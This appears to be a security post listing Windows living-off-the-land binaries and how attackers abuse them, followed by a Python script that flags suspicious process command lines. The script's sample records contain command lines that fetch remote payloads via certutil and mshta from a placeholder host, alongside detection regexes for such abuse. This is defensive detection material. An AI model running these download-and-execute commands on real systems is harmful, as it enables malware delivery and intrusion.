✅ #Powershell: Widely exploited for executing malicious scripts, downloading payloads, and establishing persistent backdoors due to its extensive capabilities.
✅ #MSHTA.exe: Used to execute malicious HTML applications, allowing attackers to run scripts from remote locations.
✅ #WMIC.exe: Abused for executing system commands and scripts remotely, aiding in lateral movement and information gathering.
✅ #Rundll32.exe: Utilized to run malicious DLL files, enabling code execution under the guise of a legitimate process.
✅ #Regsvr32.exe: Exploited to execute scripts and code via scriptlet files, bypassing application whitelisting defenses.
✅ #CertUtil.exe: Misused for downloading and decoding malicious payloads, often employed in data exfiltration.
✅ #Msiexec.exe: Leveraged to install malicious MSI packages from remote servers, facilitating the deployment of malware.
✅ #BITSAdmin.exe: Used to create download or upload jobs, helping attackers transfer files stealthily.
✅ #InstallUtil.exe: Abused to execute arbitrary code during the installation of .NET applications without writing files to disk.
✅ #MSBuild.exe: Exploited to compile and execute malicious code directly from XML project files.
✅ #At.exe / #Schtasks.exe: Misused for scheduling tasks to run malware at specific times or on system events.
✅ #Explorer.exe: Leveraged by attackers to run malicious code by injecting it into the explorer process or hijacking DLLs it loads.
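A way to turn this list into a first-pass triage over process-creation telemetry, as an added example that is not part of the original post: the sample records, the `example.invalid` host and the rule patterns are constructed here, and the regexes are a starting point for a hunt rather than a finished rule set.

```python
import ntpath
import re

# Constructed sample of process-creation records (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmd": "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe https://example.invalid/page.hta"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Users\Public\x.dll,Start"},
    {"image": r"C:\Windows\System32\rundll32.exe",      # ordinary benign use
     "cmd": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"image": r"C:\Windows\System32\certutil.exe",      # ordinary benign use
     "cmd": "certutil.exe -verify cert.cer"},
]

# Files loaded from user-writable locations are a common thread in the abuses listed above.
USER_PATH = r"\\(users|programdata|temp)\\"

# One rule set per LOLBin from the list; each regex targets the abuse the list describes
# (remote fetch, decode, DLL or project file from a user-writable path, job creation, ...).
RULES = {
    "certutil":  [r"-urlcache", r"-decode"],
    "mshta":     [r"https?://"],
    "regsvr32":  [r"https?://"],
    "msiexec":   [r"/i\s+https?://"],
    "bitsadmin": [r"/transfer", r"/addfile"],
    "rundll32":  [USER_PATH + r"[^ ]+\.dll"],
    "msbuild":   [USER_PATH + r"[^ ]+\.(xml|csproj|proj)"],
    "wmic":      [r"/node:", r"process\s+call\s+create"],
    "schtasks":  [r"/create"],
}

def triage(event):
    """Return (binary name, list of matched patterns) for one process-creation record."""
    # ntpath handles the Windows path separators regardless of the analysis host's OS.
    name = ntpath.basename(event["image"]).lower().removesuffix(".exe")
    hits = [p for p in RULES.get(name, []) if re.search(p, event["cmd"], re.IGNORECASE)]
    return name, hits

def suspicious(events):
    """Filter a batch of records down to those matching at least one LOLBin rule."""
    return [(name, ev["cmd"], hits) for ev in events for name, hits in [triage(ev)] if hits]

if __name__ == "__main__":
    for name, cmd, hits in suspicious(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}  <- {hits}")
```

Matching on the image name misses a copied and renamed binary, so where the telemetry source carries the PE's OriginalFileName, key the rules on that field as well.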
More resources:
A dual Russian and Israeli national has been charged in the United States for allegedly being the developer of the…